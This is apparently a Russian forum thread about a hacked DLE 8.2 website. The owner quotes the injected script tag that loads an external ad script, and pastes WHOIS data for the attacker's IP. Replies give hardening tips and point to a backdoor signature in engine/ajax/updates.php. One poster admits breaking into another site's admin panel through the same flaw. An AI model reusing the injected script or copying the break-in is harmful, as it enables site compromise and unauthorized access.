В общем проблемка такая. Недавно захожу на свой сайт и на своё удивление вижу что от куда то появилась рекламма кликандера. Попытался воити под админским аккаунтом, но так и не смог кто то сменил пароль, вобщем я воспользовался восстановлением пароля на e-mail зашёл в админку и нашёл в шаблоне такой код: Code: <script language='javascript' type='text/javascript' src='http://softxx.ru/m'></script> посмотрел с какого IP последний раз заходили в админку 81.222.236.109 Информация об ip-адресе 81.222.236.109 % This is the RIPE Database query service. % The objects are in RPSL format. % % The RIPE Database is subject to Terms and Conditions. % See http://www.ripe.net/db/support/db-terms-conditions.pdf % Note: This output has been filtered. % To receive output for a database update, use the "-B" flag. % Information related to '81.222.236.0 - 81.222.236.255' inetnum: 81.222.236.0 - 81.222.236.255 netname: TimeWeb descr: Hosting Service Provider country: RU admin-c: AAB74-RIPE tech-c: AAB74-RIPE status: ASSIGNED PA mnt-by: ELTEL-RIPE-MNT source: RIPE # Filtered person: Alexandr A Boykov address: 13, Sedova st. address: 192148, Saint-Petersburg address: Russia phone: +7 812 3341520 fax-no: +7 812 3341530 abuse-mailbox: [email protected] nic-hdl: AAB74-RIPE mnt-by: ELTEL-RIPE-MNT source: RIPE # Filtered % Information related to '81.222.192.0/18AS20597' route: 81.222.192.0/18 descr: ELTEL.net origin: AS20597 mnt-by: ELTEL-RIPE-MNT source: RIPE # Filtered Как я понял что кто то c VDS на TimeWebe ломает Пробовал переименовать файл admin.php, но к сожалению не помогло сейчас снова ломанули хочу сейчас права на запись main.tpl убрать незнаю поможет или нет Подскажите что можно поделать сайт стоит на DLE
Попробуй DLE обновить и попроси кого-нибудь из прошареных знакомых сайт на уязвимости проверить, может найдете дырку, через которую зараза лезет.
версия DLE 8.2 дело в том что у меня есть ещё пару сайтов на dle они на более старых версиях, но там всё нормально никто не ломает кстати сейчас погуглил нашёл http://devilstar.habrahabr.ru/blog/76359/ видимо не только у меня такая проблемка
средствами сервера поставь пароль на папку с админкой, с самим файлом .htaccess гемороится не советую, если есть директ админ - там это сделать очень просто.
В DLE 8.2 в одном из компонентов движка шелл. Настоятельно рекомендую проверить файлик, лежащий по адресу - engine/ajax/updates.php Ищем там такую шнягу - if($_GET['wert']=='') Измени/обнови файл. В следующий раз качай нуллы из достоверных источников.
версия 8.2 сильно уязвима. Давно надо было обновить двиг. Я когда то так по гуглил сайты с 8.2 и попался мне сайт хотснига... попал в админку. че тон е стал атм ничего токого делать и написал админу в аську чтобы обновил двиг ^^
ТС несколько ЭЛЕМЕНТАРНЫХ советов по обеспечению безопасности Вашего портала: 1 Качайте ВСЕ дополнения, обновления, и базовые версии скриптов ТОЛЬКО С ОФФ САЙТА РАЗРАБОТЧИКОВ 2 Внимательно следи за обновлениями и новостями офф сайта, т.к если и найдуться какие то ошибки в коде которые открывают уязвимости, то в первую очередь они опубликуються на офф сайте, а не где либо еще. 3 Не совершай быстрый переход по ссылкам которые тебе подсовывают незнакомые люди. думаю причину объяснять не нужно... 4 не пользуйся говнохостами, на моей практике до 70% взломов было через хостинг. Лично я уделяю огромное внимание выбору хостинга.
это дорогое удовольствие)) не у всех есть возможность платить за работу подобного рода. + надо самому учиться... и все подобные траблы можно было бы предотвратить, если бы ТС больше юзал офф сайт
Вычистить шшелы и бэкдры )))) 1мб кодв 20к итого ДЛЕ весит около 4мб - соответсвенно проверить на шшелы будит стоить 80 т.р ))) да нахер оно надо ))) лучше лицуху взять ))
Здрасти всем... тут такой вопрос созрел, у друга ломают сайт на mobileCMS... я (как начинающий кодер на php) помогал ему с сайтом и закрывал дыры, которые находил... но это так сказать любительский уровень... подскажите, как на готовом сайте, залитом на хост, можно найти дыры, баги, шеллы и бекдоры? мне бы теорию с азов почитать, но вот найти не могу... если где-то на античате есть ответ, дайте ссыль, пожалуйста ... спасибо...